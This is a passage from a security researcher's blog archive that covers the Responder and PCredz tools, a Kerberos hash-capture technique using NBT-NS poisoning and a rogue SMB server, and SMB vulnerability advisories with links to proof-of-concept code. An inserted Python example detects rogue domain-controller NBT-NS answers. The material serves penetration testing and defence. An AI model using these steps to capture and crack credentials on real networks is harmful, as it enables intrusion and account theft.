<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6tEYru3bPJrXHGuxkQE6Y9yZB4ocTYmr3xusydpfYCjJDXJx2-8IIp4Mex1WCf2MnxIBR0lmfkqp2Z2ybKSm00XVkuq5HaGc5m4vWZBfM42klvq0z4SyVumfir079ZqC_htzSWE4_akk/s1600/Kerberos-1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6tEYru3bPJrXHGuxkQE6Y9yZB4ocTYmr3xusydpfYCjJDXJx2-8IIp4Mex1WCf2MnxIBR0lmfkqp2Z2ybKSm00XVkuq5HaGc5m4vWZBfM42klvq0z4SyVumfir079ZqC_htzSWE4_akk/s1600/Kerberos-1.png" /></a></div>
<br />
Which shows up like this in Wireshark:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh51rloMYo9Sn4HWq7qdAc9_2P13JjbZDsyv_uc4fqGgXVMnoIcZoTLuDZjwkYkyEsT-R7NDJpRZPx14USSp3Xoq5dKToFo4XNANnRLAF_QX_9Jo0I7rfkxS3M1_mGKHnk17w-Kw_AbPvM/s1600/wireshark-1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh51rloMYo9Sn4HWq7qdAc9_2P13JjbZDsyv_uc4fqGgXVMnoIcZoTLuDZjwkYkyEsT-R7NDJpRZPx14USSp3Xoq5dKToFo4XNANnRLAF_QX_9Jo0I7rfkxS3M1_mGKHnk17w-Kw_AbPvM/s1600/wireshark-1.png" height="286" width="640" /></a></div>
<br />
Here's how the attack works:<br />
1) Poison an NBT-NS lookup on the domain controller service, wait for a SamLogonRequest, answer with a LogonSAMUserUnknownEX, then wait for a LogonPrimaryQuery and answer with a LogonSAMUserUnknownEX.<br />
2) Set up an SMB server which responds to a NegotiateProtocolRequest with the supported mech list set as Kerberos:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3wk9ARcdnLTx5tYUz8ZHs1DJyegG8kA7-fCB9NUwAss6FlYOsF-FZeTGt-xZeuaOuuGjTBi9Hp7mB4F2cvTnBidP_4XgQyTacfD226c7yaaPoF7qoKRKSTe8lik5ENlVfWMjXPp1SWMA/s1600/wireshark2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3wk9ARcdnLTx5tYUz8ZHs1DJyegG8kA7-fCB9NUwAss6FlYOsF-FZeTGt-xZeuaOuuGjTBi9Hp7mB4F2cvTnBidP_4XgQyTacfD226c7yaaPoF7qoKRKSTe8lik5ENlVfWMjXPp1SWMA/s1600/wireshark2.png" height="468" width="640" /></a></div>
<br />
and wait for the Kerberos AS-REQ on UDP 88.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGen9ilf0vQGRX9BWAfcvd_6YrN2M1ePrqUAthKcXF71ukgepVFHCsXLHpbdK0pNiRyW01mJ08xfpw_VikoFDC5Rycw6hoFELHr2sFTRcdbkXmFOBcV3ATSvdpsJJCYpvPIgr5tcCE0P4/s1600/wireshark3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGen9ilf0vQGRX9BWAfcvd_6YrN2M1ePrqUAthKcXF71ukgepVFHCsXLHpbdK0pNiRyW01mJ08xfpw_VikoFDC5Rycw6hoFELHr2sFTRcdbkXmFOBcV3ATSvdpsJJCYpvPIgr5tcCE0P4/s1600/wireshark3.png" height="150" width="640" /></a></div>
<br />
Responder will then take care of the hash parsing and formatting:<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgsQrWspBx357ZUWmO7VxvJk_p77zj1TuVOK9a7CTePOXRcmH5dr4lMZ4QYlA-4F697nnayHoS2_PgiXgVNTHLA2MSbEB_asPxN6yLXhUqeIwKsL-ElwFqfiCfMj1A_4lwxHZ64L5emTB4/s1600/mskerb1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgsQrWspBx357ZUWmO7VxvJk_p77zj1TuVOK9a7CTePOXRcmH5dr4lMZ4QYlA-4F697nnayHoS2_PgiXgVNTHLA2MSbEB_asPxN6yLXhUqeIwKsL-ElwFqfiCfMj1A_4lwxHZ64L5emTB4/s1600/mskerb1.png" height="48" width="640" /></a></div>
<br />
<br />
And will make it ready for hashcat (-m 7500):<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEja6VTwT1cNZxrVIdtxmiFA0lbwWtCtsvFKF1cNRrvJG0qYuAwsuIPz3lBCIDkVvPsAg-lS-8dU9xLnegFpPq5Ma9lBUwswbabpu0ngm6liC9aOJbUKFiWrcNz1hjgtP2fDLQDIdYPpOKA/s1600/kerb-cracked.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEja6VTwT1cNZxrVIdtxmiFA0lbwWtCtsvFKF1cNRrvJG0qYuAwsuIPz3lBCIDkVvPsAg-lS-8dU9xLnegFpPq5Ma9lBUwswbabpu0ngm6liC9aOJbUKFiWrcNz1hjgtP2fDLQDIdYPpOKA/s1600/kerb-cracked.png" height="218" width="640" /></a></div>
<br />
This will be included in the next release of Responder (https://github.com/Spiderlabs/Responder)<br />
<br />
Game over MSKerberosV5.<br />
<br />
<br /></div>
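Both the NBT-NS poisoning and Analyze mode in the Responder feature list above and step 1 of this Kerberos attack (poisoning the NBT-NS lookup for the domain controller service) rest on the fact that any host on the subnet can answer a NetBIOS name query. As an added example, not code from Responder or from this blog, the following Python implements the RFC 1001 first-level name encoding, parses NBT-NS packets, and flags positive name query responses for the 1C (domain controller) suffix that advertise, or come from, an address that is not a known DC. The domain name, addresses and transaction IDs are constructed sample values.

```python
import struct

# NetBIOS name service (RFC 1001/1002) constants
QTYPE_NB = 0x0020
SUFFIX_WORKSTATION = 0x00
SUFFIX_DC = 0x1C          # "domain controllers" group name suffix <1C>
# flags of a positive name query response: response, authoritative, recursion desired
FLAGS_POSITIVE_RESPONSE = 0x8500


def encode_netbios_name(name, suffix):
    """First-level encoding: 15-char space-padded name plus suffix byte, each byte
    split into two nibbles mapped onto 'A'..'P', wrapped in a 0x20 length byte
    and a terminating zero label (34 bytes in total)."""
    raw = name.upper().encode("ascii").ljust(15, b" ")[:15] + bytes([suffix])
    encoded = bytearray()
    for b in raw:
        encoded.append(0x41 + (b >> 4))
        encoded.append(0x41 + (b & 0x0F))
    return b"\x20" + bytes(encoded) + b"\x00"


def decode_netbios_name(label):
    """Inverse of encode_netbios_name; returns (name, suffix)."""
    if len(label) != 34 or label[0] != 0x20 or label[33] != 0x00:
        raise ValueError("not a 34-byte first-level encoded NetBIOS name")
    body = label[1:33]
    if any(c < 0x41 or c > 0x50 for c in body):
        raise ValueError("encoded name contains characters outside 'A'..'P'")
    raw = bytes(((body[i] - 0x41) << 4) | (body[i + 1] - 0x41) for i in range(0, 32, 2))
    return raw[:15].decode("ascii").rstrip(" "), raw[15]


def build_nbns_response(txid, name, suffix, ip, ttl=165):
    """Constructed positive name query response (sample packet, not a capture)."""
    header = struct.pack("!HHHHHH", txid, FLAGS_POSITIVE_RESPONSE, 0, 1, 0, 0)
    # one NB entry: 2 flag bytes (B-node, unique name) followed by the IPv4 address
    nb_entry = struct.pack("!H", 0x0000) + bytes(int(o) for o in ip.split("."))
    answer = encode_netbios_name(name, suffix) + struct.pack("!HHIH", QTYPE_NB, 0x0001, ttl, len(nb_entry))
    return header + answer + nb_entry


def parse_nbns(packet):
    """Parse the header, question and NB answer records of an NBT-NS packet."""
    txid, flags, qdcount, ancount, _, _ = struct.unpack("!HHHHHH", packet[:12])
    rec = {"txid": txid, "is_response": bool(flags & 0x8000), "question": None, "answers": []}
    off = 12
    for _ in range(qdcount):
        rec["question"] = decode_netbios_name(packet[off:off + 34])
        off += 34 + 4                      # skip QTYPE and QCLASS
    for _ in range(ancount):
        name, suffix = decode_netbios_name(packet[off:off + 34])
        off += 34
        rtype, _, ttl, rdlen = struct.unpack("!HHIH", packet[off:off + 10])
        off += 10
        rdata = packet[off:off + rdlen]
        off += rdlen
        if rtype == QTYPE_NB:
            # each NB entry is 2 flag bytes followed by one IPv4 address
            addrs = [".".join(str(b) for b in rdata[i + 2:i + 6]) for i in range(0, rdlen, 6)]
            rec["answers"].append({"name": name, "suffix": suffix, "ttl": ttl, "addrs": addrs})
    return rec


def rogue_dc_answers(packet, src_ip, trusted_dcs):
    """Return alerts for NB answers that advertise the <1C> domain controller
    service from a sender or address that is not a known DC."""
    rec = parse_nbns(packet)
    alerts = []
    if not rec["is_response"]:
        return alerts
    for ans in rec["answers"]:
        if ans["suffix"] != SUFFIX_DC:
            continue
        unknown = ({src_ip} | set(ans["addrs"])) - set(trusted_dcs)
        if unknown:
            alerts.append(f"NBT-NS answer for {ans['name']}<1C> (txid {rec['txid']:#06x}) "
                          f"from {src_ip} advertises non-DC address(es) {sorted(unknown)}")
    return alerts


if __name__ == "__main__":
    TRUSTED_DCS = {"10.0.0.10"}                     # constructed: the real DC
    rogue = build_nbns_response(0xBEEF, "CORP", SUFFIX_DC, "10.0.0.99")
    for line in rogue_dc_answers(rogue, "10.0.0.99", TRUSTED_DCS):
        print(line)
```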
<h3>Introducing PCredz (2014-04-08)</h3><div dir="ltr" style="text-align: left;" trbidi="on">
PCredz was built to extract credentials from large pcap files or from a live interface.<br />
<h1>
Stats:</h1>
Stats on juicy pcap files:<br />
- 30 MB pcap file: 15 s<br />
- 500 MB pcap file: 1.5 minutes<br />
- 2 GB pcap file: 7 minutes.<br />
<h1>
Features:</h1>
<ul>
<li>
Extract from a pcap file or from a live interface:<br />
<ul>
<li>Credit card numbers</li>
<li>POP</li>
<li>SMTP</li>
<li>IMAP</li>
<li>SNMP community string</li>
<li>FTP</li>
<li>HTTP Basic</li>
<li>NTLMv1/v2 (DCE-RPC,SMBv1/2,LDAP, MSSQL, HTTP, etc)</li>
<li>Kerberos (AS-REQ Pre-Auth etype 23) hashes.</li>
</ul>
</li>
<li>All hashes are displayed in a hashcat format (use -m 7500 for kerberos, -m 5500 for NTLMv1, -m 5600 for NTLMv2).</li>
<li>Log all credentials to a file (CredentialDump-Session.log).</li>
</ul>
<h1>Install:</h1>
<ul>
<li>Linux:</li>
</ul>
On a Debian-based OS: apt-get install python-libpcap<br />
<ul>
<li>Os X and other distributions: </li>
</ul>
wget <a href="http://downloads.sourceforge.net/project/pylibpcap/pylibpcap/0.6.4/pylibpcap-0.6.4.tar.g">http://downloads.sourceforge.net/project/pylibpcap/pylibpcap/0.6.4/pylibpcap-0.6.4.tar.g</a><br />
tar xvf pylibpcap-0.6.4.tar.gz<br />
cd pylibpcap-0.6.4<br />
python setup.py install<br />
<h1>Usage:</h1>
./Pcredz -f file-to-parse.pcap<br />
./Pcredz -d /tmp/pcap-directory-to-parse/<br />
./Pcredz -i eth0<br />
Options:<br />
-h, --help show this help message and exit<br />
-f capture.pcap Pcap file to parse<br />
-d /home/pnt/pcap/ Pcap directory to parse recursively<br />
-i eth0 interface for live capture<br />
-v More verbose.<br />
<br />
<br />
<b>You can download PCredz here</b>: <br />
https://github.com/lgandx/PCredz<br />
</div>
<h3>thoughts on NSA and our future (2014-01-05)</h3><div dir="ltr" style="text-align: left;" trbidi="on">
The recent NSA disclosures make the paranoid not so paranoid after all.<br />
<br />
We confirmed that they will listen on your calls, your internet sessions, etc., particularly if you're a foreigner; me and you.<br />
<br />
The whole current B.S. is about "So, is what you're doing U.S. constitutionally compliant?" and everyone knows that if you're asking the question in the first place, it's probably because it is not, and so people focus on getting the U.S. intelligence community to stop doing this. This might take a while doh...<br />
<br />
<b>What will happen after restrictions apply (if they do):</b><br />
<br />
- The NSA will act upon their new interpretation of the word "Spying" and will gather the same kind of data in a different way, since it is presented in a different way.<br />
- If they can't, they will reach out to and use their CSEC friends or any Five Eyes friends and get that data, since it was collected as a normal spying operation by a foreign government; but since they are friendly, they share the info, and then it is not collected by the NSA but acquired.<br />
<b>Oath Of Office:</b><br />
<br />
Oaths of office are a statement of loyalty to a <a href="http://en.wikipedia.org/wiki/Constitution" title="Constitution">constitution</a>
or other legal text or to a person or other office-holder (e.g., an
oath to support the constitution of the state, or of loyalty to the
king). Under the laws of a state it may be considered <a href="http://en.wikipedia.org/wiki/Treason" title="Treason">treason</a> or a <a href="http://en.wikipedia.org/wiki/High_crimes_and_misdemeanours" title="High crimes and misdemeanours">high crime</a> to betray a sworn oath of office.
<br />
If you expose wrongdoing done by your government which is against the constitution, it should be seen as an oath right of disclosure, in order to protect the constitution.<br />
<b>See : </b><b><b>http://en.wikipedia.org/wiki/Oath_of_office </b></b><br />
<br />
<b>So what are your options?</b><br />
You should encrypt everything you do. <br />
<br />
That simple. Don't wait for U.S congress to say "The way you defined it, it is illegal".<br />
Move on and encrypt your communications right now.<br />
The justice system, in the US and mostly around the world, works on a double standard, and when it's time to have privacy, you don't have a word to say, or if you prefer, your words will be listened to.<br />
Your pick on how you want to behave online.</div>
<h3>Responder 2.0 is out (2013-12-30)</h3><div dir="ltr" style="text-align: left;" trbidi="on">
A quick blog post to let you know that Responder 2.0 Beta is out:<br />
- https://github.com/Spiderlabs/Responder<br />
<br />
This version includes several new rogue auth servers, SMB Relay and much much more.<br />
<br />
If you enjoy internal pentests, stay tuned on http://blog.spiderlabs.com; a complete blog post will detail all the new functionalities and some actual Responder wushu.<br />
<br />
Happy new year all.</div>
<h3>Some fun with Responder 1.8 (2013-02-06)</h3><div dir="ltr" style="text-align: left;" trbidi="on">
I've made a short video on Responder 1.8 usage and examples.<br />
<br />
This video can be found here: <a href="http://www.youtube.com/watch?v=nkpK5lIPHg8">http://www.youtube.com/watch?v=nkpK5lIPHg8</a><br />
<br />
Note that on the latest version, when you open IE * you won't get any password prompt for WPAD (unlike in this video) and your browser will send your NTLM hashes along transparently.<br />
<br />
As always, latest version can be found here: https://github.com/SpiderLabs/Responder/ <br />
<br />
Cheers</div>
<h3>Owning Windows Networks with Responder 1.7 (2013-01-24)</h3><div dir="ltr" style="text-align: left;" trbidi="on">
Full post and download link can be found here:<br />
<br />
http://blog.spiderlabs.com/2013/01/owning-windows-networks-with-responder-17.html </div>
<h3>Introducing Responder 1.0 (2012-10-24)</h3><div dir="ltr" style="text-align: left;" trbidi="on">
I recently released an LLMNR/NBT-NS responder with several rogue auth servers.<br />
<br />
Full details about this tool and the download link can be found here: <a href="http://blog.spiderlabs.com/2012/10/introducing-responder-10.html">http://blog.spiderlabs.com/2012/10/introducing-responder-10.html</a><br />
<br /></div>
<h3>When MSFT does not respect their own protocol. (2012-09-05)</h3><div dir="ltr" style="text-align: left;" trbidi="on">
According to this: http://support.microsoft.com/kb/909264<br />
<br />
NetBIOS computer names cannot contain the following characters:<br />
<ul style="text-align: left;">
<li>backslash (\)</li>
<li>slash mark (/)</li>
<li>colon (:)</li>
<li>asterisk (*)</li>
<li>question mark (?)</li>
<li>quotation mark (")</li>
<li>less than sign (<)</li>
<li>greater than sign (>)</li>
<li>vertical bar (|)</li>
</ul>
Let's see how MSFT implemented their own protocol in their in-house tools:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjoQP_CsfF-Gts4IC8O5meQTWQkaoCDZW6QYVd342mg-1Fv8M2ja5MSZCOjb0WNN4-p-QyF3TuWt7gQLCYhTyQ8KJ7mAUEopOPuB7Qhk5CAHu95VU-vLi7bw6UgaJw5CO832HN1lzJjziw/s1600/Screenshot+from+2012-09-06+01:32:57.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="236" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjoQP_CsfF-Gts4IC8O5meQTWQkaoCDZW6QYVd342mg-1Fv8M2ja5MSZCOjb0WNN4-p-QyF3TuWt7gQLCYhTyQ8KJ7mAUEopOPuB7Qhk5CAHu95VU-vLi7bw6UgaJw5CO832HN1lzJjziw/s640/Screenshot+from+2012-09-06+01:32:57.png" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjqvKQ3SEzwhNAgdTiaXA3uNhY6-F0Wbtvwxc0UmFyx_2wAZRVRYPm1vQaqVGaz-Iuwrrp3ZbucHESn5Uhi3oEeesrSV7YHjIG31AKRw44fMwbPOBlfmALcmIlXrA2nKzyLMvQABt3TAB0/s1600/Screenshot+from+2012-09-06+01:34:35.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="70" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjqvKQ3SEzwhNAgdTiaXA3uNhY6-F0Wbtvwxc0UmFyx_2wAZRVRYPm1vQaqVGaz-Iuwrrp3ZbucHESn5Uhi3oEeesrSV7YHjIG31AKRw44fMwbPOBlfmALcmIlXrA2nKzyLMvQABt3TAB0/s640/Screenshot+from+2012-09-06+01:34:35.png" width="640" /></a></div>
<br />
Ok great...<br />
<br />
What about the rest?<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjcrtlqdWl81S52adkha30WAL31OGQM2pV2NOQSJWxY8o7gy3hHu0IyiUAGwj-JnsRq02f39PBb_FXfPeFiQM2_1bd2FaieimQyTI_NQaBI0YLFAPk9SJtAP0qfOA26LvzZkaiB-cK8Ix0/s1600/Screenshot+from+2012-09-06+01:20:56.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="283" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjcrtlqdWl81S52adkha30WAL31OGQM2pV2NOQSJWxY8o7gy3hHu0IyiUAGwj-JnsRq02f39PBb_FXfPeFiQM2_1bd2FaieimQyTI_NQaBI0YLFAPk9SJtAP0qfOA26LvzZkaiB-cK8Ix0/s640/Screenshot+from+2012-09-06+01:20:56.png" width="640" /></a></div>
<br />
Alright. Let's see:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZ_HXW3jSJd7gvNWp-IpDrDJieclJlx0pNT1hRhyphenhyphenDz34FkROgmIMbkeAzOEIKs6zXxTb_Nk-5xpvUCz8KrxenLqmyNMm4BXAFGbjhQ9Pw71WtaiK5N2ZvTsU-9wyVERjhj7wmQ-MkUxbY/s1600/Screenshot+from+2012-09-06+01:25:34.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="48" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZ_HXW3jSJd7gvNWp-IpDrDJieclJlx0pNT1hRhyphenhyphenDz34FkROgmIMbkeAzOEIKs6zXxTb_Nk-5xpvUCz8KrxenLqmyNMm4BXAFGbjhQ9Pw71WtaiK5N2ZvTsU-9wyVERjhj7wmQ-MkUxbY/s640/Screenshot+from+2012-09-06+01:25:34.png" width="640" /></a></div>
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEitU0H5TUSat3TkedrgY_NFT1xO5ByDO-AwqZB9Si4N7ZuzdZ7QRVce3LhqaCjUiTCFcA67gtZJS0nr-BhKOE7oIX7S3wzmInEOXbK4mEr-lxQcveVl9A4g4iw8KGEn9IOnsww1Wd5JrSI/s1600/Screenshot+from+2012-09-06+01:23:40.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="128" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEitU0H5TUSat3TkedrgY_NFT1xO5ByDO-AwqZB9Si4N7ZuzdZ7QRVce3LhqaCjUiTCFcA67gtZJS0nr-BhKOE7oIX7S3wzmInEOXbK4mEr-lxQcveVl9A4g4iw8KGEn9IOnsww1Wd5JrSI/s640/Screenshot+from+2012-09-06+01:23:40.png" width="640" /></a></div>
<br />
<br />
MSFT Rule #78: Do what I say, not what I do.<br />
<br />
*Update:<br />
<br />
Net view example: <br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPhnXm65VXVZfj7pFJhovk6RLLQcHd1xA9kDOMYZNWFgr5AjWexU7lx1sfYkAXvmgU0VSrQq7oWKkpSuyhTMDk6cHATia6I7tP7687EgpZ5U_bG12aP_x8rA5L0yYoJJtKJYbDlFpLtJk/s1600/Screenshot+from+2012-09-06+11:52:07.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="36" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPhnXm65VXVZfj7pFJhovk6RLLQcHd1xA9kDOMYZNWFgr5AjWexU7lx1sfYkAXvmgU0VSrQq7oWKkpSuyhTMDk6cHATia6I7tP7687EgpZ5U_bG12aP_x8rA5L0yYoJJtKJYbDlFpLtJk/s640/Screenshot+from+2012-09-06+11:52:07.png" width="640" /></a></div>
<br /></div>
<h3>Slides for Turning Client Side To Server Side RuxMon 2011 (Melbourne) (2012-05-10)</h3><div dir="ltr" style="text-align: left;" trbidi="on">
Long time no blog;<br />
I gave that talk in March 2011 at <a href="http://www.ruxcon.org.au/ruxmon/" target="_blank">Ruxmon</a>.<br />
I thought I should share this, since this blog is kind of a repository of some bugs I've published.<br />
<br />
Thanks to the ruxcon&amp;ruxmon crew!<br />
<br />
<a href="http://www.slideshare.net/fullscreen/lgandx/turning-clientsidetoserversideruxcon2011laurent/1">http://www.slideshare.net/fullscreen/lgandx/turning-clientsidetoserversideruxcon2011laurent/1</a></div>
<h3>MS SMB Remote Trans2 Zero Size Pool Allocation (MS10-054) (2010-08-11)</h3>This SMBv1 vulnerability was disclosed to MS back in February 2010 and patched this month in the MS10-054 bulletin.<br />
<br />
This vulnerability is quite interesting since it's present in all Windows versions since <i>Windows 2000</i>, and can be triggered easily in at least 2 different Trans2 opcodes by setting Max Data Count to 0:<br />
- <i>QUERY_FS_INFO Query FS Attribute Info</i><br />
- <i>QUERY_FS_INFO, Query FS Volume Info</i><br />
<br />
You can find the full advisory here: http://seclists.org/fulldisclosure/2010/Aug/122<br />
SRD blog entry: http://blogs.technet.com/b/srd/archive/2010/08/10/ms10-054-exploitability-details-for-the-smb-server-update.aspx<br />
<h3>Fuzzing lib released (2010-05-12)</h3>This is a fuzzing lib I've been working on for a while (it's not a complete one, but still pretty powerful); you can adapt it very easily to your fuzzer by invoking:<br />
<br />
import lib<br />
from lib import *<br />
<br />
Then you call one specific function, or randfunc().<br />
randfunc will basically choose at random the function in the lib to fuzz with.<br />
<br />
Here's a quick example using this lib:<br />
<br />
http://pastebin.com/fNFAW3Fh --> this is not an SMB fuzzer, it's simply an example of using this lib.<br />
<br />
And yes, you need to include the lib, which is located here:<br />
<br />
http://pastebin.com/xgPXpGtw<br />
<br />
Enjoy!<br />
<h3>MS10-020 (2010-04-17)</h3>This bug was discovered back in December 2009, and patched by Microsoft in April 2010.<br />
This issue is a basic stack overflow affecting only the Windows 7/2008 R2 SMBv1 implementation.<br />
It's actually a nice bug as the affected function is not protected by a canary, and allows us to redirect the flow anywhere we want to.<br />
You can find the full advisory about this bug here: http://seclists.org/fulldisclosure/2010/Apr/201<br />
Have phun !<br />
PoC url: http://pastebin.com/h3jSyJTN<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjUFM5GIUe4VhqM1XDk-1Q60mhc5Nt1LolO6pS8El_uG2yGOeMXfsZGlM26XWuLc2McBWNcdvW6g3Xz6_jeY0pEQ0rhwt3Nx9Ab8jyvecvuat13xYFtxE8BKrlHEiVkw2CYS9ef-ra-wvM/s1600/Windows7-32-2010-04-17-16-52-17.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjUFM5GIUe4VhqM1XDk-1Q60mhc5Nt1LolO6pS8El_uG2yGOeMXfsZGlM26XWuLc2McBWNcdvW6g3Xz6_jeY0pEQ0rhwt3Nx9Ab8jyvecvuat13xYFtxE8BKrlHEiVkw2CYS9ef-ra-wvM/s320/Windows7-32-2010-04-17-16-52-17.png" /></a></div>